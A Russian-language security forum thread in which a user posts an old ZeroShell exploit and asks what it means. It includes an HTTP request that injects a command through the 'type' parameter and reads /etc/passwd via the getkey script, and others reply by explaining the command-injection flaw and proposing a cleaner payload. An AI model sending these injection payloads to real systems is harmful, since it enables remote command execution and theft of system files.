HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.03.2016, 14:34
Bezlishke
Guest
Сообщений: n/a
Провел на форуме:
9828

Репутация: 3
По умолчанию

Код:
Code:
====================================================
ZeroShell ;%22
  
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
  
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: 
# milw0rm.com [2009-02-09]
Заинтересовало, но не могу одуплить.
 
Ответить с цитированием

  #2  
Старый 25.03.2016, 14:43
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от Bezlishke  
Bezlishke said:

Код:
Code:
====================================================
ZeroShell ;%22
 
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
 
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: 
# milw0rm.com [2009-02-09]
Заинтересовало, но не могу одуплить.
староватая конечно бага)

поле type участвует судя по всему в какой то баш команде, то есть

$ blablabla "blabla $type"

из за плохой фильтрации можно сделать инъекцию вида ";наша команда

%22 это как раз знак "

пайлоад у них правда странный *%22;;%22

имхо лучше так *%22;cmd;%23
 
Ответить с цитированием

  #3  
Старый 25.03.2016, 16:04
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

староватая конечно бага)
поле type участвует судя по всему в какой то баш команде, то есть
$ blablabla "blabla $type"
из за плохой фильтрации можно сделать инъекцию вида ";наша команда
%22 это как раз знак "
пайлоад у них правда странный *%22;;%22
имхо лучше так *%22;cmd;%23
Команд ИНЖ. хотя не, РЦЕ. Суть вопроса не понятна только
 
Ответить с цитированием

  #4  
Старый 25.03.2016, 16:18
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Команд ИНЖ. хотя не, РЦЕ. Суть вопроса не понятна только
так это не вопрос, а ответ был) чел выше спрашивал что эта такое
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ